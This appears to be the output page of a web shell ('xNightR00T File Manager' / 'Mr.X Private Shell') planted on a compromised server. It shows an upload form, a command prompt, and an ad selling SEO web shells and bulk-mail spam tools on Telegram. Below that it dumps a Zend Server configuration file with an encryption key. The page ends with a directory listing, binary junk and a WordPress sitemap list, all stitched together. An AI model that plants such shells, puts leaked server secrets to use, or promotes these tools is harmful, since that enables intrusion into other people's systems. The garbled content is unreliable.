xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php
/**
 * Global Configuration Override
 *
 * You can use this file for overridding configuration values from modules, etc.  
 * You would place values in here that are agnostic to the environment and not 
 * sensitive to security. 
 *
 * @NOTE: In practice, this file will typically be INCLUDED in your source 
 * control, so do not include passwords or other sensitive information in this 
 * file.
 */

return array(
	'acl' => array('zend_gui' => array('aclEnabled' => true)),
	'notifications' => array('zend_gui' => array('interval' => 5, 'lockUiOnRestart' => false, 'longNotificationTime' => 30, 'disableUpdates' => 0)),
	'zray' => array(
		'zend_gui' => array(
			'custom_namespaces'=>'Varien_, Mage::, Mage_, Zend_, Zend\, Symfony\, Doctrine\, Illuminate\, Cake\, Yii::, yii\, Phalcon\, Assetic\, Composer\, Drupal\, GuzzleHttp\, Gliph\, SebastianBergmann\, Psr\, CI_', 
			'showInIframe' => 0, 
			'showSilencedLogs' => 0, 
			'enforceAccessControl' => true, 
			'zrayRetryLimit' => 2000,
			'collapse' => 'ctrl+alt+c',
			'maxRequests' => 500,
		    'maxElementsPerLevel' => 180,
		    'maxElementsInTree' => 180,
		    'maxTreeDepth' => 15,
		)
	),
	'plugins' => array('zend_gui' => array(
	    'storeApiUrl' => 'https://api-plugins.zend.com/',
	)),
    'rss' => array('zend_gui' => array('rssDate' => 0, 'rssUrl' => 'http://www.zend.com/server/redirect/news')),
    'server' => array('zend_gui' => array('environmentColor' => "#FFFFFF", 'environmentName' => '', 'networkEnable' => true)),
	'authentication' => array('zend_gui' => array('simple' => true,'adapter' => '','groupsAttribute' => '', 'webapi_time_skew' => 360)),
	'sessionControl' => array('zend_gui' => array('sessionControlEnabled' => true, 'sessionId' => 'ZS6SESSID')),
	'list' => array('zend_gui' => array('resultsPerPage' => 20)),
	'timezone' => array('zend_gui' => array('timezone' => '')),
	'bootstrap' => array('zend_gui' => array('completed' => true, 'requireEula' => true)),
	'debugMode' => array('zend_gui' => array('debugModeEnabled' => false, 'unminify' => false)),
	'logReader' => array('zend_gui' => array('defaultLineChunk' => '200', 'maxLineChunk' => '10000')),
	'logging' => array('zend_gui' => array('logVerbosity' => 'NOTICE')),
	'license' => array('zend_gui' => array('extra' => '', 'uniqueId' => '')),
	'logout' => array('zend_gui' => array('timeout' => 15)),
	'feedback' => array('zend_gui' => array('email' => 'server6feedback@zend.com')),
	'deployment' => array('zend_gui' => array('defaultServer' => '', 'updateUrl' => 'http://updates.zend.com/libraries/')),
	'package' => array('zend_gui' => array(
			'zs_upgrade' => 1,
			'edition' => 'zs',
			'version' => '9.2.0',
			'build' => 'trunk:67340',
			'serverProfile' => '',
			'guidePage' => 1,
	)),
	'monitor' => array('zend_gui' => array(
			'defaultEmail' => '',
			'defaultCustomAction' => '',
	)),
	'encryption' => array('zend_gui' => array(
		'encryption_method' => 'aes',
		'encryption_key' => '3e_5up3R',
	)),
	'mail' => array('zend_gui' => array(
		'mail_type' => 'smtp',
		'mail_host' => '',
		'mail_port' => '',
		'return_to_address' => '',
		'from_address' => 'no-reply@zend.com',
		'authentication_method' => '',
		'authentication' => 1,
		'mail_service' => 'custom',
		'mail_ssl' => '',
		'mail_username' => '',
		'mail_password' => '',
		'templatePath' => 'data/email-templates',
	)),
	'user' => array('zend_gui' => array(
		'adminUser' => 'admin',
		'devUser' => 'developer',
		'usernameLengthMin' => '4',
		'usernameLengthMax' => '20',
		'passwordLengthMin' => '4',
		'passwordLengthMax' => '20',
	)),
	'studioIntegration' => array('zend_gui' => array(
		'studioHost' => '',
		'studioPort' => '10137',
		'studioUseSsl' => '0',
		'alternateDebugServer' => '',
		'studioAutoDetectionEnabled' => '1',
		'studioAutoDetection' => '1',
		'studioAutoDetectionPort' => '20080',
		'studioClientTimeout' => 4000,
	    'studioBreakOnFirstLine' => 1,
	    'studioUseRemote' => 1,
	)),
	'zend_server_authentication' => array('zend_gui' => array(
		'host' => '',
		'port' => '',
		'useSsl' => '',
		'useStartTls' => '',
		'username' => '',
		'password' => '',
		'baseDn' => '',
		'accountCanonicalForm' => '',
		'accountDomainName' => '',
		'accountDomainNameShort' => '',
		'bindRequiresDn' => '',
	)),
	'installation' => array('zend_gui' => array(
			'defaultPort' => 10081,
			'securedPort' => 10082,
			'enginePort' => 10083,
	)),
	'profiles' => array(
		'clusterDirectives' => array(
			'GUI' 		=> array('serverProfile'=>'Production'),
		    'ZEND' 		=> array(
                                'zend_codetracing.max_disk_space' => '1000',
				'zend_codetracing.allow_from_all' => '0',
				'zend_codetracing.allowed_hosts'=>'127.0.0.0/8',
				'zend_debugger.allow_from_all' => '0',
				'zend_debugger.allow_hosts'=>'127.0.0.0/8',
		        'zend_debugger.expose_remotely' => '1',
				'zend.monitor_generate_unique_events' => '0',
				'zray.enable' => '0',
				'zray.enable_cli' => '0',
				'zend_jobqueue.validate_ssl' => '1',
				'zend_deployment.validate_ssl' => '1',
				'zend_codetracing.buffer_size' => '10M',
				//'zend.enable_route' => '0',
				'zend.enable_privacy' => '1',),
		),
	    
	    // note:  'zend_monitor.event_tracing_mode' => 2, // stand by, 'zend_codetracing.buffer_size' => '10M' in both production/development. but still it has other value, so we set it anyway. bug #ZSRV-15027
		'productionDirectives'=>array(
			'ZEND' => array(
				'zend_codetracing.max_disk_space' => '1000',
				'zend_codetracing.allow_from_all' => '0',
				'zend_codetracing.allowed_hosts'=>'127.0.0.0/8',
				'zend_debugger.allow_from_all' => '0',
				'zend_debugger.allow_hosts'=>'127.0.0.0/8',
			    'zend_debugger.expose_remotely' => '1',
				'zend.monitor_generate_unique_events' => '0',
				'zray.enable' => '0',
				'zray.enable_cli' => '0',
				'zend_jobqueue.validate_ssl' => '1',
				'zend_deployment.validate_ssl' => '1',
				'zend_codetracing.buffer_size' => '10M',
				//'zend.enable_route' => '0',
				'zend.enable_privacy' => '1',
			    'zend_monitor.event_tracing_mode' => 2, // stand by
			),
			'GUI' 		=> array('serverProfile'=>'Production'),
			'PHP_53' 	=> array('error_reporting'=>'E_ALL & ~E_DEPRECATED', 'html_errors' => 'Off'),
			'PHP_54' 	=> array('error_reporting'=>'E_ALL & ~E_DEPRECATED & ~E_STRICT', 'html_errors' => 'On'),
			'PHP_ALL'	=> array(
				'display_errors' => 'Off',
				'display_startup_errors' => 'Off',
				'mysqlnd.collect_memory_statistics' => 'Off',
			),		
		),
		'developmentDirectives'=>array(
			'ZEND' 		=> array(
				'zend_codetracing.max_disk_space' => '500',
				'zend_codetracing.allow_from_all' => '1',
				'zend_codetracing.allowed_hosts'=>'127.0.0.0/8,10.0.0.0/8,192.168.0.0/16,172.16.0.0/12',
				'zend_debugger.allow_from_all' => '1',
				'zend_debugger.allow_hosts'=>'127.0.0.0/8,10.0.0.0/8,192.168.0.0/16,172.16.0.0/12',
			    'zend_debugger.expose_remotely' => '2',
				'zend.monitor_generate_unique_events'=>'1',
				'zray.enable' => '1',
				'zray.enable_cli' => '1',
				'zend_jobqueue.validate_ssl' => '0',
				'zend_deployment.validate_ssl' => '0',
				'zend_codetracing.buffer_size' => '10M',
				//'zend.enable_route' => '1',
				'zend.enable_privacy' => '0',
			    'zend_monitor.event_tracing_mode' => 3, // always
			),
			'GUI' 		=> array('serverProfile'=>'Development'),
			'PHP_53' 	=> array('error_reporting'=>'E_ALL | E_STRICT', 'html_errors' => 'On'),
			'PHP_54' 	=> array('error_reporting'=>'E_ALL', 'html_errors' => 'On'),
			'PHP_ALL'	=> array(
				'display_errors' => 'On',
				'display_startup_errors' => 'On',
				'mysqlnd.collect_memory_statistics' => 'On',
			),
		),
	),
	'export'=> array(
			'directivesBlacklist'=>array(
					// Global directives
					'zend.serial_number',
					'zend.user_name',
					'zend.node_id',
						
					// SC directives
					'zend_sc.network.hostname',
					'zend_sc.allowed_hosts',
					'zend_sc.ha.cluster_members',
	
					// zend.database directives
					'zend.database.type',
					'zend.database.name',
					'zend.database.host_name',
					'zend.database.port',
					'zend.database.user',
					'zend.database.password',
	
					// debugger
					'zend_debugger.allow_hosts',
					'zend_debugger.deny_hosts',
						
					// GUI directives
					'zend_gui.defaultServer',
	
			)
	),
	// GUI codetracing settings
	'codetracing' => array('zend_gui' => array(
		'codetracingProfile' => 'Default',
		'codetracingZrayInManualTrace' => '0',
	)),
);

Filemanager

Name Type Size Permission Actions
azure Folder 0755
zray-standalone Folder 0755
global.config.php File 8.22 KB 0644
license.acl.global.config.php File 4.48 KB 0644
navigation.global.config.php File 11.76 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml